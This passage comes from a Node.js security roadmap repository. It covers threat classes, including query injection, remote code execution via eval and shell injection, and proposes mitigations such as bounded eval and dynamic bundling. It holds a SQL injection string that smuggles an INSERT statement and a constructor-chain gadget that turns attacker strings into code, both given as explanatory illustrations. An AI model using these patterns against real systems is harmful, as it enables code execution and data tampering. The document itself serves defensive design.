34 | can violate system integrity by forging records:
35 |
36 | ```js
37 | ' SELECT * FROM Table WHERE key="' + value + '" ' ===
38 | ' SELECT * FROM Table WHERE key=""; INSERT INTO Table ... --" '
39 | ```
40 |
41 | or deny service via mass deletes.
42 |
43 | Query injection has a [long and storied history][hall-of-shame].
44 |
45 | [Query injection]: http://bobby-tables.com/
46 | [hall-of-shame]: http://codecurmudgeon.com/wp/sql-injection-hall-of-shame/
47 | [spp]: https://rawgit.com/mikesamuel/sanitized-jquery-templates/trunk/safetemplate.html#structure_preservation_property
48 |
--------------------------------------------------------------------------------
/chapter-1/threat-RCE.md:
--------------------------------------------------------------------------------
1 | # Remote Code Execution
2 |
3 | Remote code execution occurs when the application interprets an
4 | untrustworthy string as code. When `x` is a string, `eval(x)`,
5 | `Function(x)`, and `vm.runIn*Context(x)` all invoke the JavaScript
6 | engine's parser on `x`. If an attacker controls `x` then they can run
7 | arbitrary code in the context of the CommonJS module or `vm` context
8 | that invoked the parser.
9 |
10 | Sandboxing can help but widely available sandboxes have
11 | [known workarounds][denicola-vm-run] though the [frozen realms][]
12 | proposal aims to change that.
13 |
14 | It is harder to execute remote code in server-side JavaScript.
15 | `this[x][y] = "javascript:console.log(1)"` does not cause code to
16 | execute for nearly as many `x` and `y` as in a browser.
17 |
18 | These operators are probably rarely used *explicitly*, but some
19 | operators that convert strings to code when given a string do
20 | something else when given a `Function` instance. `setTimeout(x, 0)`
21 | is safe when `x` is a function, but on the browser it parses a string
22 | input as code.
23 |
24 | * [Grepping](../appendix/experiments.md#grep-problems) shows the rate
25 | in the top 100 modules and their transitive dependencies by simple
26 | pattern matching after filtering out comments and string content.
27 | This analysis works on most modules, but fails to distinguish
28 | safe uses of `setTimeout` in modules that might run on
29 | the client from unsafe.
30 | * A [type based analysis](../appendix/experiments.md#jsconf) can
31 | distinguish between those two, but the tools we tested don't
32 | deal well with mixed JavaScript and TypeScript inputs.
33 |
34 | Even if we could reliably identify places where strings are
35 | *explicitly* converted to code for the bulk of npm modules,
36 | it is more difficult in JavaScript to statically prove that
37 | code does not *implicitly* invoke a parser than in other
38 | common backend languages.
39 |
40 | ```js
41 | // Let x be any value not in
42 | // (null, undefined, Object.create(null)).
43 | var x = {},
44 | // If the attacker can control three strings
45 | a = 'constructor',
46 | b = 'constructor',
47 | s = 'console.log(s)';
48 | // and trick code into doing two property lookups
49 | // they control, a call with a string they control,
50 | // and one more call with any argument
51 | x[a][b](s)();
52 | // then they can cause any side-effect achievable
53 | // solely via objects reachable from the global scope.
54 | // This includes full access to any exported module APIs,
55 | // all declarations in the current module, and access
56 | // to builtin modules like child_process, fs, and net.
57 | ```
58 |
59 | Filtering out values of `s` that "look like JavaScript" as they reach
60 | server-side code will probably not prevent code execution.
61 | [Yosuke Hasegawa][Yosuke] how to reencode arbitrary JavaScript using
62 | only 6 punctuation characters, and that number may
63 | [fall to 5][Masato]. ["Web Application Obfuscation"][obfusc] by
64 | Heiderich et al. catalogues ways to bypass filtering.
65 |
66 | `eval` also allows remote-code execution in Python, PHP, and
67 | Ruby code, but in those languages `eval` operators are harder to
68 | mention implicitly which means uses are easier to check.
69 |
70 | It is possible to dynamically evaluate strings even in statically
71 | compiled languages, for example, [JSR 223][] and
72 | [`javax.compiler`][dynjava] for Java. In statically compiled
73 | languages there is no short implicit path to `eval` and it is not
74 | easier to `eval` an untrusted input than to use an intepreter that is
75 | isolated from the host environment.
76 |
77 | We consider remote code execution in Node.js lower frequency than for
78 | client-side JavaScript without a Content-Security-Policy but higher
79 | than for other backend languages. We consider the severity the same
80 | as for other backend languages. The serverity is higher than for
81 | client-side JavaScript because backend code often has access to more
82 | than one user's data and privileged access to other backends.
83 |
84 | [denicola-vm-run]: https://gist.github.com/domenic/d15dfd8f06ae5d1109b0
85 | [frozen realms]: https://github.com/tc39/proposal-frozen-realms
86 | [Yosuke]: https://news.ycombinator.com/item?id=4370098
87 | [Masato]: https://syllab.fr/projets/experiments/xcharsjs/5chars.pipeline.html
88 | [obfusc]: https://www.amazon.com/Web-Application-Obfuscation-Evasion-Filters/dp/1597496049
89 | [JSR 223]: https://docs.oracle.com/javase/8/docs/technotes/guides/scripting/prog_guide/api.html
90 | [dynjava]: https://www.ibm.com/developerworks/library/j-jcomp/index.html
91 |
--------------------------------------------------------------------------------
/chapter-1/threat-SHP.md:
--------------------------------------------------------------------------------
1 | # Shell Injection during Production
2 |
3 | [Shell injection][] occurs when an attacker-controlled string changes
4 | the structure of a command passed to a shell or causes a child process
5 | to execute an unintended command or with unintended arguments.
6 | Typically, this is because code or a dependency invokes
7 | [child\_process][api/child_process] with an argument partially
8 | composed from untrusted inputs.
9 |
10 | Shell injection may also occur during development and deployment. For
11 | example, [npm][npm hooks] and [Bower][bower hooks]
12 | `{pre-,,post-}install` hooks may be subject to shell injection via
13 | filenames that contain shell meta-characters in malicious transitive
14 | dependencies but we classify this as an [MTP][] vulnerability.
15 |
16 | [MTP]: threat-MTP.md
17 | [npm hooks]: https://docs.npmjs.com/misc/scripts
18 | [bower hooks]: https://bower.io/docs/config/#hooks
19 | [Shell injection]: http://cwe.mitre.org/data/definitions/77.html
20 | [api/child_process]: https://nodejs.org/api/child_process.html
21 |
--------------------------------------------------------------------------------
/chapter-1/threats.md:
--------------------------------------------------------------------------------
1 | # Threat environment
2 |
3 | The threat environment for Node.js is similar to that for other runtimes that
4 | are primarily used for microservices and web frontends, but there are some
5 | Node.js specific concerns.
6 |
7 | We define both kinds of threats in this section. A reader familiar with
8 | web-application security can skip all but this page and the discussion
9 | of [*unintended require*][UIR] without missing much, but may find it
10 | helpful to refer back to the table below when reading later chapters.
11 |
12 | ## Server vs Client-side JavaScript
13 |
14 | Before we discuss the threat environment, it's worth noting that the threat
15 | environment for server-side JavaScript is quite different from that for
16 | client-side JavaScript. For example,
17 |
18 | * Client-side JavaScript runs in the context of the
19 | [same-origin policy][] possibly with a
20 | [Content-Security-Policy][CSP] which governs which code can load.
21 | Server-side JavaScript **code loading** is typically only
22 | constrained by the files on the server, and the values that can
23 | reach `require(...)`, `eval(...)` and similar operators.
24 | * Client-side JavaScript typically only has access to data that the
25 | human using the browser should have access to. On the server,
26 | applications are responsible for **data [compartmentalization][]**,
27 | and server-side JavaScript often has privileged access to storage
28 | systems and other backends.
29 | * **File-system access** by the client typically either requires human
30 | interaction
31 | (``, `Content-disposition:attachment`), or can only access
32 | a directory dedicated to third-party content (browser cache, local storage)
33 | and which is not usually on a list like `$PATH`.
34 | On the server, the Node runtime process's privileges determine
35 | [file-system access][nodejs/fs].
36 | * Client-side JavaScript has no concept of a **shell** that converts
37 | strings into commands that runs outside the JavaScript engine.
38 | Server-side JavaScript can spawn
39 | [child processes][nodejs/child_process] that operate on data
40 | received over the network, and on data that is accessible to the
41 | Node runtime process.
42 | * **Network messages** sent by server-side JavaScript originate inside
43 | the server's LAN, but those sent by client-side JavaScript typically do not.
44 | * **Shared memory concurrency** in client-side JavaScript happens via
45 | well-understood APIs like `SharedArrayBuffer`. Experimental modules
46 | ([code][threads-a-gogo]) and a [workers proposal][]
47 | allow server-side JavaScript to fork threads; it is
48 | unclear how widespread these are in production or how
49 | [susceptible][thread corner cases] these are to memory corruption
50 | or exploitable race conditions.
51 | * Client-side, the browser halts all scripts in a document when a
52 | single event loop cycle **runs too long**.
53 | Node.js has few ways to manage runaway computations on the server.
54 |
55 | The threat environment for server-side JavaScript is much closer to
56 | that for any other server-side framework than JavaScript in the
57 | browser.
58 |
59 | ## Classes of Threats {#threat_table}
60 |
61 | The table below lists broad classes of vulnerabilities, and for each,
62 | a short identifier by which we refer to the class later in this
63 | document. This list is not meant to be comprehensive, but we expect
64 | that a thorough security assessment would touch on most of these and
65 | would have low confidence in an assessment that skips many.
66 |
67 | The frequency and severity of vulnerabilities are guesstimates since
68 | we have little hard data on the frequency of these in Node.js
69 | applications, so have extrapolated from similar systems. For example,
70 | see discussion about frequency in [buffer overflow][BOF].
71 |
72 | For each, relevant mitigation strategies appear in the mitigations
73 | columns, and link to the discussion.
74 |
75 | | Shorthand | Description | Frequency | Severity | Mitigations |
76 | | --------- | ------------------------------------------------------------------------------------- | --------- | -------- | --------------------------- |
77 | | [0DY][] | Zero-day. Attackers exploit a vulnerability before a fix is available. | Low-Med | Med-High | [cdeps][m-cd] [fail][m-fa] |
78 | | [BOF][] | Buffer overflow. | Low | High | [ovrsi][m-os] |
79 | | [CRY][] | Misuse of crypto leads to poor access-control decisions or data leaks. | Medium | Medium | [ovrsi][m-os] |
80 | | [DEX][] | Poor developer experience slows or prevents release of features. | ? | ? | [dynam][m-dy] [ovrsi][m-os] |
81 | | [DOS][] | Denial of service | Medium | Low-Med | TBD |
82 | | [EXF][] | Exfiltration of data, e.g. by exploiting reflection to serialize more than intended. | Med-High | Low-Med | [ovrsi][m-os] |
83 | | [LQC][] | Using low quality dependencies leads to exploit | Medium | Low-Med | [kdeps][m-kd] [ovrsi][m-os] |
84 | | [MTP][] | Theft of commit rights or MITM causes `npm install` to fetch malicious code. | Low | Med-High | [kdeps][m-kd] [cdeps][m-cd] |
85 | | [QUI][] | Query injection on a production machine. | Medium | Med-High | [ovrsi][m-os] [qlang][m-ql] |
86 | | [RCE][] | Remote code execution, e.g. via `eval` | Med-High | High | [dynam][m-dy] [ovrsi][m-os] |
87 | | [SHP][] | Shell injection on a production machine. | Low | High | [ovrsi][m-os] [cproc][m-cp] |
88 | | [UIR][] | `require(untrustworthyInput)` loads code not intended for production. | Low | Low-High | [dynam][m-dy] |
89 |
90 |
91 | ## Meltdown and Spectre
92 |
93 | As of this writing, the security community is trying to digest
94 | the implications of *Meltdown* and *Spectre*. The
95 | [Node.js blog][Meltdown Spectre Impact] addresses them from a
96 | Node.js perspective, so we do not comment in depth.
97 |
98 | It is worth noting though that those vulnerabilities lead to
99 | breaches of *confidentiality*. While confidentiality violations
100 | are serious, the suggestions that follow use design principles
101 | that prevent a violation of confidentiality from causing a
102 | violation of *integrity*. Specifically:
103 |
104 | * Knowing a whitelist of production source hashes does not
105 | allow an attacker to cause a non-production source to load.
106 | * Our runtime `eval` mitigation relies on JavaScript reference
107 | equality, not knowledge of a secret.
108 |
109 |
110 | [same-origin policy]: https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy
111 | [CSP]: https://developers.google.com/web/fundamentals/security/csp/
112 | [compartmentalization]: https://cwe.mitre.org/data/definitions/653.html
113 | [nodejs/fs]: https://nodejs.org/api/fs.html
114 | [nodejs/child_process]: https://nodejs.org/api/child_process.html
115 | [threads-a-gogo]: https://github.com/xk/node-threads-a-gogo/blob/74005641d53b0d85e8d75e2506eddbded15f5112/src/threads_a_gogo.cc#L1387
116 | [workers proposal]: https://github.com/nodejs/worker/issues/2
117 | [thread corner cases]: https://github.com/nodejs/worker/issues/4#issuecomment-306090967
118 | [Query Injection]: https://cwe.mitre.org/data/definitions/89.html
119 | [0DY]: threat-0DY.md
120 | [BOF]: threat-BOF.md
121 | [CRY]: threat-CRY.md
122 | [DEX]: threat-DEX.md
123 | [DOS]: threat-DOS.md
124 | [EXF]: threat-EXF.md
125 | [LQC]: threat-LQC.md
126 | [MTP]: threat-MTP.md
127 | [QUI]: threat-QUI.md
128 | [RCE]: threat-RCE.md
129 | [SHP]: threat-SHP.md
130 | [UIR]: threat-UIR.md
131 | [m-dy]: ../chapter-2/dynamism.md
132 | [m-kd]: ../chapter-3/knowing_dependencies.md
133 | [m-cd]: ../chapter-4/close_dependencies.md
134 | [m-os]: ../chapter-5/oversight.md
135 | [m-fa]: ../chapter-6/failing.md
136 | [m-cp]: ../chapter-7/child-processes.md
137 | [m-ql]: ../chapter-7/query-langs.md
138 | [Meltdown Spectre Impact]: https://nodejs.org/en/blog/vulnerability/jan-2018-spectre-meltdown/
139 |
--------------------------------------------------------------------------------
/chapter-2/bounded-eval.md:
--------------------------------------------------------------------------------
1 | # Dynamically bounding `eval`
2 |
3 | If we could provide an API that was available statically, but not dynamically
4 | we could double-check uses of `eval` operators.
5 |
6 | ```js
7 | // API for allowing some eval
8 | var prettyPlease = require('prettyPlease');
9 | // Carefully reviewed JavaScript generating code
10 | var codeGenerator = require('codeGenerator');
11 |
12 | let compile;
13 |
14 | prettyPlease.mayI(
15 | module,
16 | (evalPermission) => {
17 | compile = function (source) {
18 | const js = codeGenerator.generateCode(source);
19 | return prettyPlease.letMeEval(
20 | evalPermission,
21 | js,
22 | () => ((0, eval)(js)));
23 | };
24 | });
25 |
26 | exports.compile = compile;
27 | ```
28 |
29 | The `prettyPlease` module cannot be pure JavaScript since only the
30 | C++ linker can take advantage of *CodeGeneration* callbacks
31 | ([code][CodeGeneration callbacks]) the way CSP does
32 | ([code][CSP callback]) on the client, but the definition would be
33 | roughly:
34 |
35 | ```js
36 | // prettyPlease module
37 | (() => {
38 | const _PERMISSIVE_MODE = 0; // Default
39 | const _STRICT_MODE = 1;
40 | const _REPORT_ONLY_MODE = 2;
41 |
42 | const _MODE = /* From command line arguments */;
43 | const _WHITELIST = new Set(/* From command line arguments */);
44 |
45 | const _VALID_PERMISSIONS = new WeakSet();
46 | const _EVALABLE_SOURCES = new Map();
47 |
48 | if (_MODE !== _PERMISSIVE_MODE) {
49 | // Pseudocode: the code-generation callback installed when the
50 | // JavaScript engine is initialized.
51 | function codeGenerationCheckCallback(context, source) {
52 | // source must be a v8::Local or ChakraCore equivalent
53 | // so no risk of polymorphing
54 | if (_EVALABLE_SOURCES.has(source)) {
55 | return true;
56 | }
57 | console.warn(...);
58 | return _MODE == _REPORT_ONLY_MODE;
59 | }
60 | }
61 |
62 | // requestor -- the `module` value in the scope of the code requesting
63 | // permissions.
64 | // callback -- called with the generated permission whether granted or
65 | // not. This puts the permission in a parameter name making it
66 | // much less likely that an attacker who controls a key to obj[key]
67 | // can steal it.
68 | module.mayI = function (requestor, callback) {
69 | const id = String(requestor.id);
70 | const filename = String(requestor.filename);
71 | const permission = Object.create(null); // Token used for identity
72 | // TODO: Needs privileged access to real module cache so a module
73 | // can't masquerade as another by mutating the module cache.
74 | if (_MODE !== _PERMISSIVE_MODE
75 | && requestor === require.cache[filename]
76 | && _WHITELIST.has(id)) {
77 | _VALID_PERMISSIONS.add(permission);
78 | // Typical usage is to request permission once during module load.
79 | // Removing from whitelist prevents later bogus requests after
80 | // the module is exposed to untrusted inputs.
81 | _WHITELIST.delete(id);
82 | }
83 | return callback(permission);
84 | };
85 |
86 | // permission -- a value received via mayI
87 | // sourceToEval -- code to eval. The code generation callback will
88 | // expect this exact string as its source.
89 | // codeThatEvals -- a callback that will be called in a scope that
90 | // allows eval of sourceToEval.
91 | module.letMeEval = function (permission, sourceToEval, codeThatEvals) {
92 | sourceToEval = String(sourceToEval);
93 | if (_MODE === _PERMISSIVE_MODE) {
94 | return codeThatEvals();
95 | }
96 |
97 | if (!_VALID_PERMISSIONS.has(permission)) {
98 | console.warn(...);
99 | if (_MODE !== _REPORT_ONLY_MODE) {
100 | return codeThatEvals();
101 | }
102 | }
103 |
104 | const countBefore = _EVALABLE_SOURCES.get(sourceToEval) || 0;
105 | _EVALABLE_SOURCES.set(sourceToEval, countBefore + 1);
106 | try {
107 | return codeThatEvals();
108 | } finally {
109 | if (countBefore) {
110 | _EVALABLE_SOURCES.set(sourceToEval, countBefore);
111 | } else {
112 | _EVALABLE_SOURCES.delete(sourceToEval);
113 | }
114 | }
115 | };
116 | })();
117 | ```
118 |
119 | and the `eval` operators would check that their argument is in the global
120 | set.
121 |
122 | Implicit access to `eval` is possible because reflective operators can
123 | reach `eval`. As long as we can prevent reflective access to
124 | `evalPermissions` we can constrain what can be `eval`ed. If
125 | `evalPermission` is a function parameter, then only `arguments`
126 | aliases it, so functions that do not mention the special name
127 | `arguments` may safely receive one. Most functions do not mention
128 | `arguments`. Before whitelisting a module, a reviewer would be wise
129 | to check for any use of `arguments`, and for any escape of permissions
130 | or `module`.
131 |
132 | `evalPermission` is an opaque token — only its reference identity
133 | is significant, so we can check membership in a `WeakSet` without
134 | risk of forgery.
135 |
136 | This requires API changes to existing modules that dynamically use
137 | `eval`, but the changes should be additive and straightforward.
138 |
139 | It also allows project teams and security specialists to decide on
140 | a case-by-case basis, which modules really need dynamic `eval`.
141 |
142 | As with synthetic modules, frozen realms may provide a way to further
143 | restrict what dynamically loaded code can do. If you're trying to
144 | decide whether to trust a module that dynamically loads code, you have
145 | more ways to justifiably conclude that it's safe if the module loads
146 | into a sandbox restricts to a limited frozen API.
147 |
148 | [CodeGeneration callbacks]: https://cs.chromium.org/chromium/src/third_party/WebKit/Source/bindings/core/v8/V8Initializer.cpp?rcl=ed08e77a52d977fdb8f4c2a0b27e3d5a73019a57&l=626
149 | [CSP callback]: https://cs.chromium.org/chromium/src/third_party/WebKit/Source/bindings/core/v8/V8Initializer.cpp?rcl=ed08e77a52d977fdb8f4c2a0b27e3d5a73019a57&l=352
150 |
--------------------------------------------------------------------------------
/chapter-2/bundling.md:
--------------------------------------------------------------------------------
1 | # Dynamic Bundling
2 |
3 | Consider a simple Node application:
4 |
5 | ```js
6 | // index.js
7 | // Example that uses various require(...) use cases.
8 |
9 | let staticLoad = require('./lib/static');
10 | function dynamicLoad(f, x) {
11 | return f('./lib/' + x);
12 | }
13 | dynamicLoad(require, Math.random() < 2 ? 'dynamic' : 'bogus');
14 | exports.lazyLoad = () => require('./lib/lazy');
15 |
16 | // Fallback to alternatives
17 | require(['./lib/opt1', './lib/opt2'].find(
18 | (name) => {
19 | try {
20 | require.resolve(name);
21 | return true;
22 | } catch (_) {
23 | return false;
24 | }
25 | }));
26 | ```
27 |
28 | with some unit tests:
29 |
30 | ```js
31 | // test/test.js
32 |
33 | var expect = require("chai").expect;
34 | var app = require("../index");
35 |
36 | describe("My TestSuite", () => {
37 | describe("A test", () => {
38 | it("A unittest", () => {
39 | // Exercise the API
40 | app.lazyLoad();
41 | });
42 | });
43 | });
44 | ```
45 |
46 | We hack `updateChildren`, which gets called by `Module._load` for new
47 | modules and when a module requires a cached module, to dump information
48 | about loads:
49 |
50 | ```diff
51 | diff --git a/lib/module.js b/lib/module.js
52 | index cc8d5097bb..945ab8a4a8 100644
53 | --- a/lib/module.js
54 | +++ b/lib/module.js
55 | @@ -59,8 +59,18 @@ stat.cache = null;
56 |
57 | function updateChildren(parent, child, scan) {
58 | var children = parent && parent.children;
59 | - if (children && !(scan && children.includes(child)))
60 | + if (children && !(scan && children.includes(child))) {
61 | + if (parent.filename && child.id) {
62 | + // HACK: rather than require('fs') to write a file out, we
63 | + // log to the console.
64 | + // We assume the prefix will be removed and the result wrapped in
65 | + // a DOT digraph.
66 | + console.log(
67 | + 'REQUIRE_LOG_DOT: ' + JSON.stringify(parent.filename)
68 | + + ' -> ' + JSON.stringify(child.id) + ';');
69 | + }
70 | children.push(child);
71 | + }
72 | }
73 | ```
74 |
75 | Running the tests and extracting the graph ([code][extract-script])
76 | gives us a rather [hairy dependency graph](example/graphs/full.svg):
77 |
78 |
79 |
80 | We add an edge from `"./package.json"` to the module's main file.
81 | Then we filter edges ([code][graph-filter]) to include only those
82 | reachable from `"./package.json"`. This lets us distinguish files
83 | loaded by the test runner and tests from those loaded after control
84 | has entered an API in a production file.
85 |
86 | The resulting graph is much simpler:
87 |
88 | 
89 |
90 | Note that the production file list includes dynamically and lazily
91 | loaded files. It does include `./lib/opt2.js` but not `./lib/opt1.js`.
92 | The former file does not exist, so the loop which picks the first
93 | available alternative tries and finds the latter.
94 |
95 | Our production source list should include all the files we need
96 | in production if
97 |
98 | * The unit tests `require` the main file
99 | * The unit tests have enough coverage to load all modules required
100 | in production via APIs defined in the main file or in APIs
101 | transitively loaded from there.
102 |
103 | It is definitely possible to miss some files. If the unit test did
104 | not call `app.lazyLoad` then there would be no edge to
105 | `./lib/lazy.js`. To address this, developers can
106 |
107 | * Expand test coverage to exercise code paths that load the
108 | missing source files.
109 | * Or add an explicit whitelist like
110 | ```js
111 | // production-source-whitelist.js
112 | require('./index.js');
113 | require('./lib/lazy.js');
114 | ```
115 | and explicitly pass this as the main file to the filter
116 | instead of defaulting to the one specified in `package.json`.
117 |
118 | Dynamic analysis is not perfect, but a missing source file is
119 | readily apparent, so this replaces
120 |
121 | * hard-to-detect bugs with potentially severe security consequences,
122 |
123 | with
124 |
125 | * easy-to-detect bugs with negligible security consequences.
126 |
127 | [extract-script]: https://github.com/google/node-sec-roadmap/blob/master/chapter-2/example/make_dep_graph.sh
128 | [graph-filter]: https://github.com/google/node-sec-roadmap/blob/6130b76446ff4efbb276d8128c12e41ea2fffbc9/chapter-2/example/make_dep_graph.sh#L39-L73
129 |
--------------------------------------------------------------------------------
/chapter-2/dynamism.md:
--------------------------------------------------------------------------------
1 | # Dynamism when you need it
2 |
3 | ## Background
4 |
5 | Node.js code is composed of CommonJS modules that are linked together
6 | by the builtin `require` function, or [`import`][import-js] statements
7 | (used by [TypeScript][import-ts]) that typically transpile to
8 | `require` (modulo [experimental features][esm]).
9 |
10 | `require` itself calls `Module._load` ([code][Module._load]) to
11 | resolve and load code. ["The Node.js Way"][FKS] explains this flow
12 | well.
13 |
14 | Unlike `import`, `require` is dynamic: a runtime value can specify the
15 | name of a module to load. (The EcmaScript committee is considering a
16 | [dynamic `import` operator][import-op-strawman], but we have
17 | not included that in this analysis.)
18 |
19 |
20 | This dynamism is powerful and flexible and enables varied use cases
21 | like the following:
22 |
23 | * Lazy loading. Waiting to load a dependency until it is definitely needed.
24 | ```js
25 | const infrequentlyUsedAPI = (function () {
26 | const dependency = require('dependency');
27 | return function infrequentlyUsedAPI() {
28 | // Use dependency
29 | };
30 | }());
31 | ```
32 | * Loading plugins based on a configuration object.
33 | ```js
34 | function Service(config) {
35 | (config.plugins || []).forEach(
36 | (pluginName) => {
37 | require(pluginName).initPlugin(this);
38 | });
39 | }
40 | ```
41 | * Falling back to an alternate service provider if the first choice
42 | isn't available:
43 | ```js
44 | const KNOWN_SERVICE_PROVIDERS = ['foo-widget', 'bar-widget'];
45 | const serviceProviderName = KNOWN_SERVICE_PROVIDERS.find(
46 | (name) => {
47 | try {
48 | require.resolve(name);
49 | return true;
50 | } catch (_) {
51 | return false;
52 | }
53 | });
54 | const serviceProvider = require(serviceProviderName);
55 | ```
56 | * Taking advantage of an optional dependency when it is available.
57 | ```js
58 | let optionalDependency = null;
59 | try {
60 | optionalDependency = require('optionalDependency');
61 | } catch (_) {
62 | // Oh well.
63 | }
64 | ```
65 | * Loading a handler for a runtime value based on a naming convention.
66 | ```js
67 | function handle(request) {
68 | const handlerName = request.type + '-handler'; // Documented convention
69 | let handler;
70 | try {
71 | handler = require(handlerName);
72 | } catch (e) {
73 | throw new Error(
74 | 'Expected handler ' + handlerName
75 | + ' for requests with type ' + request.type);
76 | }
77 | return handler.handle(request);
78 | }
79 | ```
80 | * Introspecting over module metadata.
81 | ```js
82 | const version = require('./package.json').version;
83 | ```
84 |
85 | During rapid development, [file-system monitors][nodemon] can restart
86 | a node project when source files change, and the application stitches
87 | itself together without the complex compiler and build system
88 | integration that statically compiled languages use to do incremental
89 | recompilation.
90 |
91 |
92 | ## Problem
93 |
94 | Threats: [DEX][] [RCE][] [UIR][]
95 |
96 | The `node_modules` directory does not keep production code separate
97 | from test code. If test code can be `require`d in production, then
98 | an attacker may find it far easier to execute a wide variety of other
99 | attacks. See [UIR][] for more details on this.
100 |
101 | Node applications rely on dynamic uses of `require` and changes that
102 | break any of these use cases would require coordinating large scale
103 | changes to existing code, tools, and development practices threatening
104 | [developer experience][DEX].
105 |
106 | Requiring developers to pick and choose which source files are
107 | production and which are test would either:
108 |
109 | * Require them to scrutinize source files not only for their project
110 | but also for deep dependencies with which they are unfamiliar
111 | leading to poor developer experience.
112 | * Whitelist without scrutiny leading to the original security problem.
113 | * Lead them to not use available modules to solve problems and instead
114 | roll their own leading to poor developer experience, and possibly
115 | [LQC][] problems.
116 |
117 | We need to ensure that only source code written with production
118 | constraints in mind loads in production without increasing the burden
119 | on developers.
120 |
121 | When the behavior of code in production is markedly different from that
122 | on a developer's workstation, developers lose confidence that they
123 | can avoid bugs in production by testing locally which may lead
124 | to poor developer experience and lower quality code.
125 |
126 |
127 | ## Success Criteria
128 |
129 | We would have prevented abuse of `require` if:
130 |
131 | * Untrusted inputs could not cause `require` to load a
132 | non-production source file,
133 | * and/or no non-production source files are reachable by
134 | `require`,
135 | * and/or loading a non-production source file has no adverse effect.
136 |
137 | We would have successfully prevented abuse of `eval`, `new Function`
138 | and related operators if:
139 |
140 | * Untrusted inputs cannot reach an `eval` operator,
141 | * and/or untrusted inputs that reach them cause no adverse affects,
142 | * and/or security specialists could whitelist uses of `eval` operators
143 | that are necessary for the functioning of the larger
144 | system and compatible with the system's security goals.
145 |
146 | In both cases, converting dynamic operators to static before untrusted
147 | inputs reach the system reduces the attack surface. Requiring
148 | large-scale changes to existing npm modules or requiring large scale
149 | rewrites of code that uses using them constitutes compromises [DEX][].
150 |
151 |
152 | ## Current practices
153 |
154 | Some development teams use [webpack][] or similar tools to statically
155 | bundle server-side modules, and provide flexible transpilation
156 | pipelines. That's a great way to do things, but solving security
157 | problems only for teams with development practices mature enough to
158 | deploy via webpack risks preaching to the choir.
159 |
160 | Webpack, in its minimal configuration, does not attempt to skip
161 | test files ([code][webpack-experiment]).
162 | Teams with an experienced webpack user can use it to great effect, but
163 | it is not an out-of-the-box solution.
164 |
165 | Webpacking does not prevent calls to `require(...)` with unintended
166 | arguments, but greatly reduces the chance that they will load
167 | non-production code. As long as the server process cannot read
168 | JS files other than those in the bundle, then a webpacked server
169 | is safe from [UIR][]. This may not be the case if the production
170 | machine has npm modules globally installed, and the server process
171 | is not running in a [chroot jail][].
172 |
173 |
174 | ## A Possible Solution
175 |
176 | We present one possible solution to demonstrate that tackling this
177 | problem is feasible.
178 |
179 | If we can compute the entire set of `require`-able sources when
180 | dealing only with inputs from trusted sources, then we can
181 | ensure that the node runtime only loads those sources even when
182 | exposed to untrusted inputs.
183 |
184 | We propose these changes:
185 |
186 | * A two phase approach to prevent abuse of `require`.
187 | 1. Tweaks to the node module loader that make it easy to
188 | [dynamically bundle](bundling.md) a release candidate.
189 | 2. Tweaks to the node module loader in production to restrict
190 | code loads based on [source content hashes](source-contents.md)
191 | from the bundling phase.
192 | * Two different strategies for preventing abuse of
193 | [`eval`](what-about-eval.md).
194 | * JavaScript idioms that can allow many uses of `eval` to
195 | [load as modules](synthetic-modules.md) and to bundle as above.
196 | * Using JavaScript engine callbacks to
197 | [allow uses of `eval`](bounded-eval.md) by approved modules.
198 |
199 | [DEX]: ../chapter-1/threat-DEX.md
200 | [LQC]: ../chapter-1/threat-LQC.md
201 | [RCE]: ../chapter-1/threat-RCE.md
202 | [UIR]: ../chapter-1/threat-UIR.md
203 | [webpack]: https://webpack.js.org/
204 | [Symbol]: (https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Symbol)
205 | [import-js]: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/import
206 | [import-ts]: https://www.typescriptlang.org/docs/handbook/modules.html#import
207 | [Module._load]: https://github.com/nodejs/node/blob/0fdd88a374e23e1dd4a05d93afd5eb0c3b080fd5/lib/module.js#L449
208 | [FKS]: http://fredkschott.com/post/2014/06/require-and-the-module-system/
209 | [esm]: https://nodejs.org/api/esm.html#esm_ecmascript_modules
210 | [nodemon]: https://nodemon.io/
211 | [import-op-strawman]: https://github.com/tc39/proposal-dynamic-import
212 | [chroot jail]: https://help.ubuntu.com/community/BasicChroot
213 | [webpack-experiment]: https://github.com/google/node-sec-roadmap/tree/master/chapter-2/experiments/webpack-compat
214 |
--------------------------------------------------------------------------------
/chapter-2/example/.gitignore:
--------------------------------------------------------------------------------
1 | node_modules
2 |
--------------------------------------------------------------------------------
/chapter-2/example/graphs/filtered.dot:
--------------------------------------------------------------------------------
1 | digraph Modules {
2 | "./package.json" [fillcolor=black,fontcolor=white,style=filled];
3 | "./index.js" -> "./lib/static.js";
4 | "./index.js" -> "./lib/dynamic.js";
5 | "./index.js" -> "./lib/opt2.js";
6 | "./index.js" -> "./lib/lazy.js";
7 | "./package.json" -> "./index.js";
8 | }
9 |
--------------------------------------------------------------------------------
/chapter-2/example/graphs/filtered.svg:
--------------------------------------------------------------------------------
1 |
2 |
4 |
6 |
7 |
80 |
--------------------------------------------------------------------------------
/chapter-2/example/index.js:
--------------------------------------------------------------------------------
1 | /**
2 | * @license
3 | * Copyright 2017 Google LLC
4 | *
5 | * Licensed under the Apache License, Version 2.0 (the "License");
6 | * you may not use this file except in compliance with the License.
7 | * You may obtain a copy of the License at
8 | *
9 | * https://www.apache.org/licenses/LICENSE-2.0
10 | *
11 | * Unless required by applicable law or agreed to in writing, software
12 | * distributed under the License is distributed on an "AS IS" BASIS,
13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
14 | * See the License for the specific language governing permissions and
15 | * limitations under the License.
16 | */
17 |
18 | // index.js
19 | // Example that tests various kinds of loads.
20 |
21 | let staticLoad = require('./lib/static');
22 | function dynamicLoad(f, x) {
23 | return f('./lib/' + x);
24 | }
25 | dynamicLoad(require, Math.random() < 2 ? 'dynamic' : 'bogus');
26 | exports.lazyLoad = () => require('./lib/lazy');
27 |
28 | // Fallback to alternatives
29 | require(['./lib/opt1', './lib/opt2'].find(
30 | (name) => {
31 | try {
32 | require.resolve(name);
33 | return true;
34 | } catch (_) {
35 | return false;
36 | }
37 | }));
38 |
--------------------------------------------------------------------------------
/chapter-2/example/lib/dynamic.js:
--------------------------------------------------------------------------------
1 | /**
2 | * @license
3 | * Copyright 2017 Google LLC
4 | *
5 | * Licensed under the Apache License, Version 2.0 (the "License");
6 | * you may not use this file except in compliance with the License.
